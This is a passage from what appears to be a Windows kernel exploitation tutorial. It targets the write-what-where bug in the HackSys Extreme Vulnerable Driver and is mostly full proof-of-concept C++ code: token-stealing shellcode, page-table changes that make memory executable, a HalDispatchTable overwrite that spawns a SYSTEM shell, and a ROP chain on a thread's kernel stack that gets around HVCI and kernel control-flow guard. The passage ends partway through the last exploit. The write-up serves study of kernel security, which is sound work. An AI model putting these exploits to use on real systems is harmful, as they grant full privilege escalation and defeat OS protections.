printf("success\n"); } else { printf("failed\n"); return 1; } getchar(); // Step 6 pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress( GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile"); if (!NtQueryIntervalProfile) { printf("[-] Unable to find ntdll!NtQueryIntervalProfile\n"); return 1; } printf("[+] Found ntdll!NtQueryIntervalProfile\n"); printf("[+] Calling nt!NtQueryIntervalProfile to execute nt!HalDispatchTable+0x8...\n"); ULONG x = 0; NtQueryIntervalProfile( 0x1337, &x ); printf("[+] Spawning a shell with elevated privileges\n\n"); system("cmd"); return 0; }
Method (3) - KUSER_SHARED_DATA
Now that we know how to exploit this WRITE-WHAT-WHERE, there is one more common method instead of writing in the driver’s code cave, there is another method utilizing KUSER_SHARED_DATA structure.
According to Microsoft: Source
The KUSER_SHARED_DATA structure is being abused for Windows Kernel Exploitation for a while now and as it states this address is always static in both kernel and user space and it also has READ and WRITE permission. But this was fixed after Windows 10 Insider Preview build 20246. However my current Windows 10 PRO Build 19045 (22H2) which is the latest version, does not seems implemented the fix yet.
Checking the static address (0xFFFFF78000000000
), there is some data written here already, so those are the values being used by the KUSER_SHARED_DATA
structure itself.
Checking the structure size, it’s 0x720 bytes in total and from the microsoft article, it mentioned a single page (4 KB) is allocated for this, that means 0x1000 - 0x720 = 0x8E0 bytes available for our use.
Since we don’t want to touch the KUSER_SHARED_DATA
structure, let’s leave the space for that and find a location for our shellcode, I decided to pick KUSER_SHARED_DATA + 0x800
and we can see it’s empty, we got a static code cave. And checking the region, it has READ and WRITE but not EXECUTE, but that’s fine, utilizing WRITE-WHAT-WHERE, we can change that.
Let’s give this a try, it’s gonna be same methodology as what covered is in “Method (2)” except one single change, instead of using HEVD code cave address, we gonna replace that with the static KUSER_SHARED_DATA
address.
- The
shellcode_start
andkernelShellcode
is changed withKUSER_SHARED_DATA + 0x800
address.
int main()
{
WRITE_WHAT_WHERE input;
NTSTATUS success;
printf("[+] Opening handle to driver\n");
HANDLE hDriver = CreateFileW(
L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
FILE_SHARE_WRITE,
nullptr,
OPEN_EXISTING,
0,
nullptr);
if (hDriver == INVALID_HANDLE_VALUE)
{
printf("[!] Failed to open handle: %d", GetLastError());
return 1;
}
LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
printf("[+] Nt base address: %p\n", nt_addr);
LPVOID shellcode_start = (LPVOID)(0xFFFFF78000000000 + 0x800); // KUSER_SHARED_DATA + 0x800
LPVOID kernelShellcode = (LPVOID)(0xFFFFF78000000000 + 0x800); // KUSER_SHARED_DATA + 0x800
printf("[+] Address of Shellcode in kernel space: %p\n", shellcode_start);
// Step 2
BYTE shellcode[] = {
0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x49, 0x89,
0xC0, 0x4D, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49,
0x81, 0xE8, 0x48, 0x04, 0x00, 0x00, 0x4D, 0x8B, 0x88,
0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xF9, 0x04, 0x75,
0xE5, 0x49, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x80,
0xE1, 0xF0, 0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00,
0x31, 0xC0, 0xC3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};
size_t size = sizeof(shellcode);
size_t num_chunks = size / 8;
uint64_t* chunks = new uint64_t[num_chunks];
for (size_t i = 0; i < num_chunks; i++) {
std::memcpy(&chunks[i], &shellcode[i * 8], 8);
input.WHAT = (LPVOID)(&chunks[i]);
input.WHERE = (LPVOID)(shellcode_start);
printf("[+] Calling TriggerArbitraryWrite to Write Shellcode in 0x%p....", shellcode_start);
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
shellcode_start = (LPVOID)((uintptr_t)shellcode_start + 0x8);
}
[ REST OF THEM ARE SAME ]
}
Updated and executed the POC and the shellcode was written to the KUSER_SHARED_DATA + 0x800
(0xFFFFF78000000800
) address. I can confirm the same using WinDBG.
The next step will be calculating the PTE of the KUSER_SHARED_DATA + 0x800
address and get the PTE bits/flags. The values retrieved are same from !pte
command.
Modified the bits/flags and cleared the no eXecute bit on our shellcode region:
And the HalDispatchTable is also overwritten successfully:
Finally by calling NtQueryIntervalProfile()
, we got the SYSTEM:
Even everything seems fine and good, but sometimes I get this BSOD CRITICAL_STRUCTURE_CORRUPTION after SYSTEM shell is spawned, maybe some checks kick-in and finds that HalDispatchTable
is modified and we did not revert back to it’s original state yet.
To fix this, added a step to copy the original value before overwriting nt!HalDispatchTable+0x8
Basically it’s a pointer to nt!HalpSetSystemInformation and now we have a backup of this pointer.
After overwriting the pointer with our kernel-space shellcode address and executing it we can replace it.
NtQueryIntervalProfile()
function will execute our shellcode and then revert back the nt!HalDispatchTable+0x8
before spawing a new cmd.exe
Checking back the HalDispatchTable
, it reverted back.
Full POC:
#include <Windows.h> #include <stdio.h> #include <psapi.h> #include <cstdint> #include <cstring> #define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS) typedef struct _WRITE_WHAT_WHERE { void* WHAT; void* WHERE; } WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE; typedef NTSTATUS(WINAPI* pNtQueryIntervalProfile)(IN ULONG ProfileSource, OUT PULONG Interval); PVOID getbaseaddress(LPCWSTR name) { BOOL status; LPVOID* pImageBase; DWORD ImageSize; WCHAR driverName[1024]; LPVOID driverBase = nullptr; status = EnumDeviceDrivers(nullptr, 0, &ImageSize); pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize); int driver_count = ImageSize / sizeof(pImageBase[0]); for (int i = 0; i < driver_count; i++) { GetDeviceDriverBaseNameW(pImageBase[i], driverName, sizeof(driverName) / sizeof(char)); if (!wcscmp(name, driverName)) { driverBase = pImageBase[i]; break; } } return driverBase; } uintptr_t MiGetPte(LPVOID lpMemory) { uintptr_t addr = reinterpret_cast<uintptr_t>(lpMemory); uintptr_t calc1 = addr >> 9; // shr rcx, 9 uintptr_t calc2 = calc1 & 0x7FFFFFFFF8; // and rax, rcx return calc2; } int main() { WRITE_WHAT_WHERE input; NTSTATUS success; printf("[+] Opening handle to driver\n"); HANDLE hDriver = CreateFileW( L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr); if (hDriver == INVALID_HANDLE_VALUE) { printf("[!] Failed to open handle: %d", GetLastError()); return 1; } LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe"); printf("[+] Nt base address: %p\n", nt_addr); LPVOID shellcode_start = (LPVOID)(0xFFFFF78000000000 + 0x800); // KUSER_SHARED_DATA + 0x800 LPVOID kernelShellcode = (LPVOID)(0xFFFFF78000000000 + 0x800); // KUSER_SHARED_DATA + 0x800 printf("[+] Address of Shellcode in kernel space: %p\n", shellcode_start); // Step 2 BYTE shellcode[] = { 0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xC0, 0x4D, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xE8, 0x48, 0x04, 0x00, 0x00, 0x4D, 0x8B, 0x88, 0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xF9, 0x04, 0x75, 0xE5, 0x49, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x80, 0xE1, 0xF0, 0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x31, 0xC0, 0xC3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; size_t size = sizeof(shellcode); size_t num_chunks = size / 8; uint64_t* chunks = new uint64_t[num_chunks]; for (size_t i = 0; i < num_chunks; i++) { std::memcpy(&chunks[i], &shellcode[i * 8], 8); input.WHAT = (LPVOID)(&chunks[i]); input.WHERE = (LPVOID)(shellcode_start); printf("[+] Calling TriggerArbitraryWrite to Write Shellcode in 0x%p....", shellcode_start); success = DeviceIoControl( hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input), nullptr, 0, nullptr, nullptr); if (success) { printf("success\n"); } else { printf("failed\n"); return 1; } shellcode_start = (LPVOID)((uintptr_t)shellcode_start + 0x8); } delete[] chunks; getchar(); // Step 3 LPVOID PteBase = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE); printf("[+] Allocated region to read MiGetPteAddress+0x13 Address: %p\n", PteBase); input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); input.WHERE = (LPVOID)(PteBase); printf("[+] Calling TriggerArbitraryWrite...."); success = DeviceIoControl( hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input), nullptr, 0, nullptr, nullptr); if (success) { printf("success\n"); } else { printf("failed\n"); return 1; } LPVOID* basePTE = (LPVOID*)PteBase; printf("[+] Base address of PTE: %p\n", *basePTE); uintptr_t ShellcodePte = MiGetPte(kernelShellcode); uintptr_t actualPTE = (uintptr_t)*basePTE + ShellcodePte; printf("[+] PTE of shellcode address: %p\n", actualPTE); getchar(); LPVOID pfnShellcode = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE); printf("[+] Allocated region to read PFN of shellcode: %p\n", pfnShellcode); input.WHAT = (LPVOID)(actualPTE); input.WHERE = (LPVOID)(pfnShellcode); printf("[+] Calling TriggerArbitraryWrite...."); success = DeviceIoControl( hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input), nullptr, 0, nullptr, nullptr); if (success) { printf("success\n"); } else { printf("failed\n"); return 1; } LPVOID* pfn = (LPVOID*)pfnShellcode; printf("[+] PFN of shellcode address: %p\n", *pfn); getchar(); // Step 4 uintptr_t modifiedPFN = (uintptr_t)*pfn & 0x0FFFFFFFFFFFFFFF; printf("[+] Modified PFN of shellcode with \"E\" flag: %p\n", modifiedPFN); input.WHAT = (LPVOID)(&modifiedPFN); input.WHERE = (LPVOID)(actualPTE); printf("[+] Calling TriggerArbitraryWrite...."); success = DeviceIoControl( hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input), nullptr, 0, nullptr, nullptr); if (success) { printf("success\n"); } else { printf("failed\n"); return 1; } getchar(); // Step 5 LPVOID halPointer = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE); printf("[+] Allocated region to read HalDispatchTable+0x8 pointer: %p\n", halPointer); input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); // HalDispatchTable+0x8 input.WHERE = (LPVOID)(halPointer); printf("[+] Calling TriggerArbitraryWrite...."); success = DeviceIoControl( hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input), nullptr, 0, nullptr, nullptr); if (success) { printf("success\n"); } else { printf("failed\n"); return 1; } LPVOID* hal0x8 = (LPVOID*)halPointer; printf("[+] Original pointer stored in HalDispatchTable+0x8: %p\n", *hal0x8); getchar(); // Step 6 input.WHAT = (LPVOID)(&kernelShellcode); input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); // HalDispatchTable+0x8 printf("[+] Overwriting HalDispatchTable+0x8 with: %p\n", kernelShellcode); printf("[+] Calling TriggerArbitraryWrite...."); success = DeviceIoControl( hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input), nullptr, 0, nullptr, nullptr); if (success) { printf("success\n"); } else { printf("failed\n"); return 1; } getchar(); // Step 7 pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress( GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile"); if (!NtQueryIntervalProfile) { printf("[-] Unable to find ntdll!NtQueryIntervalProfile\n"); return 1; } printf("[+] Found ntdll!NtQueryIntervalProfile\n"); printf("[+] Calling nt!NtQueryIntervalProfile to execute nt!HalDispatchTable+0x8...\n"); ULONG x = 0; NtQueryIntervalProfile( 0x1337, &x ); // Step 8 printf("[+] Reverting HalDispatchTable+0x8 to it's original state...\n"); input.WHAT = (LPVOID)(hal0x8); input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); // HalDispatchTable+0x8 printf("[+] Calling TriggerArbitraryWrite...."); success = DeviceIoControl( hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input), nullptr, 0, nullptr, nullptr); if (success) { printf("success\n"); } else { printf("failed\n"); return 1; } getchar(); printf("[+] Spawning a shell with elevated privileges\n\n"); system("cmd"); return 0; }
Method (4) - HVCI (Memory Integrity) Enabled
Now all of the above attacks worked with Virtualization-based Security (VBS) enabled but Hypervisor-Enforced Code Integrity (HVCI) or Memory Integrity is disabled in the VM machine.
Enabled HVCI and restarted the machine to try the above exploits again, it ends up with the following error:
This is because, isolation is implemented through Virtual Trust Levels (VTLs), which I have already explained in: https://ghostbyt3.github.io/blog/Kernel_Exploitation_Primer_0x3#hyper-v.
So in our attack, we have flipped the PTE bits/flags and cleared the no eXecute bit in VTL0, however EPT (Extended Page Tables) in VTL1 does not have this change and it blocks our exploit.
# PTE before clearing the no eXecute bit
---DA--KW-V
# PTE after clearing the no eXecute bit
---DA--KWEV
# EPTE
---DA--W-V
Additionally, with HVCI and VBS enabled, kCFG (kernel control flow guard) is also fully enabled. The kCFG bitmap (nt!guard_icall_bitmap
) (bitmap is used to track which function addresses are valid call targets) is also protected by EPTE, so we can’t overwrite it. However kCFG protects function pointers (like nt!HalDispatchTable + 0x8
) but does not protect return addresses. This means that while we cannot modify function pointers to redirect execution arbitrarily, we can overwrite a return address on the stack to hijack control flow. This is what we gonna do now.
Like I mentioned in my previous post, we can’t execute unsigned-code within the Windows kernel. But we can leverage ROP chain to call kernel-mode functions, I have also attempted similar function calls in previous post, but I couldn’t make it reliable, but let’s try that with WRITE-WHAT-WHERE vulnerability with different methodology. I am following the methodology as Connor McGarr mentioned in his blog post. I highly recommend to read that.
This is what we gonna do to get around the HVCI and abuse WRITE-WHAT-WHERE to make Kernel function calls:
- Step 1: Create a dummy thread in suspended state using CreateThread() API.
- Step 2: Using NtQuerySystemInformation() API leak the
KTHREAD
structure address of the suspended thread. - Step 3: From the KTHREAD structure we retrieve
KTHREAD.StackBase
which is the kernel-mode stack address of the thread. - Step 4: From the stack we will be looking for a specific function’s
ret
address, as you know when a functioncall
occurred, the next instruction’s address is pushed to the stack, so after the execution of the call, theret
instruction willpop
the return address from stack and jump to it, and kCFG (kernel control flow guard) does not inspect this hijack, so we are gonna find a specific return address (more on this later) and replace that with our ROP chain which makes a kernel function call. - Step 5: Once we found the return address in the stack, we will write the rest of the ROP chain, to make a call to
ZwOpenProcess()
to get aPROCESS_ALL_ACCESS
handle on system.exe. - Step 6: Then at the end our ROP chain with a call to the kernel-mode function
ZwTerminateThread()
, which will terminate the dummy thread because we messed the stack, it will cause BSOD if we didn’t do this. - Step 7: Finally, we resume the thread using ResumeThread() API, while continuing the thread, it will land on the return address in the stack which we have overwritten and it will start executing our ROP chain and get the handle to the system process and at the end terminates itself.
Step 1: Creating a dummy thread
- Creating a dummy thread can be done easily by calling
CreateThread()
API withCREATE_SUSPENDED
asdwCreationFlags
. - Once the thread is created, it will return a handle to the dummy suspended thread (
dHandle
). - Also, we need to mention what function the thread needs to execute once it is resumed, for that I provided a dummy function called
donoting()
.
void donothing()
{
return;
}
HANDLE fakethread() {
HANDLE dHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)donothing, NULL, CREATE_SUSPENDED, NULL);
if (!dHandle) {
printf("[-] Failed creating a suspended thread..\n");
}
else {
printf("[+] Dummy thread Handle: %d\n", dHandle);
}
return dHandle;
}
int main()
{
printf("[+] Creating a dummy thread..\n");
HANDLE dHandle = fakethread();
if (!dHandle) {
return 1;
}
return 0;
}
Step 2: Leak KTHREAD address
- Now we need to retrieve the KTHREAD of the dummy thread, for that we can use
NtQuerySystemInformation()
API function. - Since we need the information related to handles , we will be using
SystemHandleInformation
in theSystemInformationClass
member, which indicate the kind of system information to be retrieved. - We need the following structures for this process: SYSTEM_INFORMATION_CLASS, SYSTEM_HANDLE_INFORMATION, SYSTEM_HANDLE_TABLE_ENTRY_INFO.
- The
SystemHandleInformation
class, will provide all the handle information in the machine. - From the
NtQuerySystemInformation()
API call, we will be storing all of these handle information inSystemHandleInfo
. However, we need to provide the required size to store all of these handle information, which we can’t predict. We can just allocate a huge space but that’s not reliable. - To solve this issue, I started with size 0x1000 bytes and gradually increased until it does not get
STATUS_INFO_LENGTH_MISMATCH
status. - Then it parses every handle and check the handle’s
UniqueProcessId
is as same as the current process ID. Once the current process is discovered, it starts to check the handle which we provided via argument with all the handles of the process. - Once the specific handle is discovered, we can get the object address with the help of
_SYSTEM_HANDLE_TABLE_ENTRY_INFO
which contains a member calledObject
which is the address of the specific object, in this case we are looking for the dummy “thread” handle, so the object is thread, this means theObject
member holds theKTHREAD
address of the specific handle.
PVOID findKTHREAD(HANDLE dHandle) {
pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(
GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation) {
printf("[-] Unable to find ntdll!NtQuerySystemInformation\n");
return FALSE;
}
printf("[+] Found ntdll!NtQuerySystemInformation\n");
ULONG returnLen = 0x1000;
NTSTATUS success, status;
PSYSTEM_HANDLE_INFORMATION SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)returnLen);
do {
if (SystemHandleInfo) {
HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
}
SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, returnLen);
if (!SystemHandleInfo) {
printf("[-] HeapAlloc Failed With Error: %d\n", GetLastError());
return FALSE;
}
status = NtQuerySystemInformation(SystemHandleInformation, SystemHandleInfo, returnLen, &returnLen);
} while (status == STATUS_INFO_LENGTH_MISMATCH);
PVOID dKTHREAD = NULL;
for (ULONG i = 0; i < SystemHandleInfo->NumberOfHandles; i++)
{
if (SystemHandleInfo->Handles[i].UniqueProcessId == GetCurrentProcessId())
{
if (dHandle == (HANDLE)SystemHandleInfo->Handles[i].HandleValue)
{
dKTHREAD = SystemHandleInfo->Handles[i].Object;
printf("[+] Found KTHREAD of the dummy thread %p\n", dKTHREAD);
free(SystemHandleInfo);
break;
}
}
}
HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
return dKTHREAD;
}
Executed the POC and it created a dummy thread with handle 0xA8. Using Process Explorer, we can cross verify the KTHREAD leaked address from POC is same as from Process Explorer, so our script works fine.
Step 3: Retrieving kernel stack address
KTHREAD is a structure associated with every thread, this contains every information about the thread (which is an another big topic which I can not cover now). But this is all we need to know now, KTHREAD contains 2 interesting members which is required for the upcoming steps, we need their offsets:
StackLimit
- offset 0x30StackBase
- offset 0x38
As I said earlier, each thread has it’s own stack and it’s stack address can be retrieved through StackBase
member of KTHREAD.
Now we already have a KTHREAD address, we can calculate the address of StackLimit
and StackBase
and read the actual values using WRITE-WHAT-WHERE, just like what we did in previous methods.
Created a kernelRead()
function which will read the provided address (as argument readAddr
) and read the value from that address by calling the TriggerArbitraryWrite()
function.
PVOID kernelRead(PVOID readAddr, HANDLE hDriver) {
WRITE_WHAT_WHERE input;
LPVOID storeAddr = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
input.WHAT = (LPVOID)(readAddr);
input.WHERE = (LPVOID)(storeAddr);
printf("[+] Calling TriggerArbitraryWrite to Read %p....", readAddr);
NTSTATUS success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return FALSE;
}
LPVOID* data = (LPVOID*)storeAddr;
return *data;
}
By calling the kernelRead()
function, we can retrieve both StackLimit
and StackBase
values with KTHREAD
address and their respective offset.
// Step 3
PVOID stackLimit = kernelRead(PVOID((uintptr_t)dKTHREAD + 0x30), hDriver); // KTHREAD.StackLimit
printf("[+] Dummy thread's StackLimit: %p\n", stackLimit);
PVOID stackBase = kernelRead(PVOID((uintptr_t)dKTHREAD + 0x38), hDriver); // KTHREAD.StackBase
printf("[+] Dummy thread's StackBase: %p\n", stackBase);
Executed the updated POC and retrieved StackLimit
and StackBase
address and cross-verified with the KTHREAD
structure of the dummy thread.
With the retrieved address, the total stack size of the thread id 0x6000. We need this for the next step.
0: kd> ? 0xfffff88e`b4126000 - 0xfffff88e`b4120000
Evaluate expression: 24576 = 00000000`00006000
Step 4: Find the return address of nt!KiApcInterrupt
Our goal is to overwrite a specific function’s return address of the dummy thread we created. Using WinDBG’s !thread
extension with the KTHREAD
address, we can view the call stack. You might notice the function nt!KiApcInterrupt
, we will be overwriting this return address.
When a new thread is created it initially runs nt!KiStartUserThread
in the kernel-mode, and then calls the system initial thread routine, nt!PspUserThreadStartup
, you can see this in the call stack as well. Since we created the thread in suspended state (CREATE_SUSPENDED
). It will hold all the execution, including the donothing()
function we made.
If you look at the call stack, the nt!KiApcInterrupt+0x2ff (TrapFrame @ fffff88e
b4125740)` contains a trap frame, basically it stores the CPU register state allowing to resume execution correctly when the thread is resumed.
So when a thread is resumed, it will return from nt!KiApcInterrupt+0x2ff
, so we need to find this (nt!KiApcInterrupt+0x2ff
) return address and overwrite with our ROP gadgets.
The return address in my machine is nt!KiApcInterrupt+0x2ff
, so we need it’s offset. Because this will be the address stored in the stack. We gonna find this address in the stack.
0: kd> ? nt!KiApcInterrupt+0x2ff - nt
Evaluate expression: 4209647 = 00000000`00403bef
When the thread is resumed (from user-mode using ResumeThread()
), the execution will return from nt!KiApcInterrupt+0x2ff
which will eventually executes our ROP chain, that’s the goal.
In previous step we got the StackBase
and StackLimit
and we got the offset of the nt!KiApcInterrupt+0x2ff
as well, so basically we gonna find this address in the stack frame.
The following for
loop will read every 8 bytes using kernelRead
beginning from the stack frame (StackBase
) till the end of stack (StackLimit
). Also, remember that stack grows downwards, so we need to move towards the lower memory addresses.
// Step 4
LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
printf("[+] Nt base address: %p\n", nt_addr);
int stackSize = (uintptr_t)stackBase - (uintptr_t)stackLimit;
PVOID retAddr = NULL;
PVOID stackRet = NULL;
for (int i = 0x8; i < stackSize - 0x8; i += 0x8)
{
retAddr = kernelRead(PVOID((uintptr_t)stackBase - i), hDriver);
if (retAddr == PVOID((uintptr_t)nt_addr + 0x00403bef)) // nt!KiApcInterrupt+0x2ff
{
printf("[+] Found nt!KiApcInterrupt+0x2ff in the stack %p\n", PVOID((uintptr_t)stackBase - i));
stackRet = PVOID((uintptr_t)stackBase - i);
break;
}
}
Paused the execution using getchar()
to analyze it and the above code found nt!KiApcInterrupt+0x2ff
in stack at location 0xFFFFF88EB4125738
and confirmed the same in WinDBG. Now that we found the location of the return address we need to overwrite, let’s move to the next step.
Step 5 & 6: Writing ROP gadgets to call ZwOpenProcess & ZwTerminateThread
Similar to kernelRead
, I created this kernelWrite
function which takes the value to write (data
) and the location to write that value (writeAddr
) as arguments. And it will call TriggerArbitraryWrite
to write that value in the provided address.
PVOID kernelWrite(PVOID data, PVOID writeAddr, HANDLE hDriver) {
WRITE_WHAT_WHERE input;
input.WHAT = (LPVOID)(&data);
input.WHERE = (LPVOID)(writeAddr);
printf("[+] Calling TriggerArbitraryWrite to Write on %p....", writeAddr);
NTSTATUS success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return FALSE;
}
}
The ROP gadget is similar to what I have used previously. It will make a call to ZwOpenProcess
to get a full control process handle to system.exe
. Then it will terminate the dummy thread by calling ZwTerminateThread
, the reason for this call is, we messed the stack of the dummy thread with our ROP gadgets, so after the execution of ZwOpenProcess
API, it will try to run the thread normally but it will lead to BSOD. To solve this we can just terminate the thread, since we don’t need it anymore.
ZwOpenProcess
API requires some structures as parameters but it can be declared in user-mode.ZwTerminateThread
API requires the dummy thread handle, since I already stored that indHandle
, I just used it.- Created a
for
loop to write each ROP gadgets in the stack and I stored the location ofnt!KiApcInterrupt+0x2ff
instackRet
so provided that as first address and moving on it increases the address by 8 bytes to move to next address.
// Step 5
// RCX - ProcessHandle
HANDLE hSystem = NULL;
// R8 - ObjectAttributes
OBJECT_ATTRIBUTES objAttrs = { 0 };
memset(&objAttrs, 0, sizeof(objAttrs));
objAttrs.ObjectName = NULL;
objAttrs.Length = sizeof(objAttrs);
// R9 - ClientId
CLIENT_ID clientId = { 0 };
clientId.UniqueProcess = ULongToHandle(4);
clientId.UniqueThread = NULL;
LPVOID rop[] = {
(LPVOID)((uintptr_t)nt_addr + 0x00202e71), // pop rcx; ret
(LPVOID)&hSystem, // Handle
(LPVOID)((uintptr_t)nt_addr + 0x004e13ce), // pop rdx; ret
(LPVOID)PROCESS_ALL_ACCESS,
(LPVOID)((uintptr_t)nt_addr + 0x00201861), // pop r8; ret
(LPVOID)&objAttrs,
(LPVOID)((uintptr_t)nt_addr + 0x00201862), // pop rax; ret
(LPVOID)&clientId,
(LPVOID)((uintptr_t)nt_addr + 0x00343f0e), // mov r9, rax; mov rax, r9; add rsp, 0x28; ret;
(LPVOID)(0x4141414141414141), // 0x8
(LPVOID)(0x4141414141414141), // 0x10
(LPVOID)(0x4141414141414141), // 0x18
(LPVOID)(0x4141414141414141), // 0x20
(LPVOID)(0x4141414141414141), // 0x28
(LPVOID)((uintptr_t)nt_addr + 0x003fb260), // nt!ZwOpenProcess
(LPVOID)((uintptr_t)nt_addr + 0x00202e71), // pop rcx; ret
(LPVOID)(ULONG64)dHandle, // Thread Handle
(LPVOID)((uintptr_t)nt_addr + 0x004e13ce), // pop rdx; ret
(LPVOID)(0x0000000000000000),
(LPVOID)((uintptr_t)nt_addr + 0x003fb800), // nt!ZwTerminateThread // Step 6
};
printf("[+] Writing Shellcode to the thread stack...\n");
for (int i = 0; i < sizeof(rop) / sizeof(rop[0]); i++) {
kernelWrite((rop[i]), stackRet, hDriver);
stackRet = (LPVOID)((uintptr_t)stackRet + 0x8);
}
Executed the above POC and we can see the nt!KiApcInterrupt+0x2ff
return address is overwritten by the ROP gadget and rest of the ROP gadgets are in place.
Step 7: Resume the Thread
Now that everything is ready, we can resume the thread by calling ResumeThread
.
ResumeThread(dHandle);
Sleep(2000);
printf("[+] System process Handle 0x%lx\n", hSystem);
getchar();
Once the thread is resumed, it will look for the nt!KiApcInterrupt+0x2ff
return address, since it’s replaced by our ROP gadget, it will start executing that and eventually call ZwOpenProcess
to get Full Control handle on system.exe
process.
HVCI is one of the powerful mitigation and we didn’t bypassed HVCI, instead we can get around with that by calling Kernel APIs. But we are not able to execute unsigned shellcode. However, we bypassed kCFG by using the dummy thread method but there is Control-flow Enforcement Technology (kCET) which will block the above method if it’s enabled. But it’s not enabled by default, atleast for now.
Full POC
// whatwhere3.cpp : This file contains the 'main' function. Program execution begins and ends there. // #include <Windows.h> #include <stdio.h> #include <psapi.h> #include "header.h" #define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS) typedef NTSTATUS(WINAPI* pNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004 typedef struct _WRITE_WHAT_WHERE { void* WHAT; void* WHERE; } WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE; PVOID getbaseaddress(LPCWSTR name) { BOOL status; LPVOID* pImageBase; DWORD ImageSize; WCHAR driverName[1024]; LPVOID driverBase = nullptr; status = EnumDeviceDrivers(nullptr, 0, &ImageSize); pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize); int driver_count = ImageSize / sizeof(pImageBase[0]); for (int i = 0; i < driver_count; i++) { GetDeviceDriverBaseNameW(pImageBase[i], driverName, sizeof(driverName) / sizeof(char)); if (!wcscmp(name, driverName)) { driverBase = pImageBase[i]; break; } } return driverBase; } void donothing() { return; } HANDLE fakethread() { HANDLE dHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)donothing, NULL, CREATE_SUSPENDED, NULL); if (!dHandle) { printf("[-] Failed creating a suspended thread..\n"); } else { printf("[+] Dummy thread Handle: 0x%lx\n", dHandle); } return dHandle; } PVOID findKTHREAD(HANDLE dHandle) { pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress( GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { printf("[-] 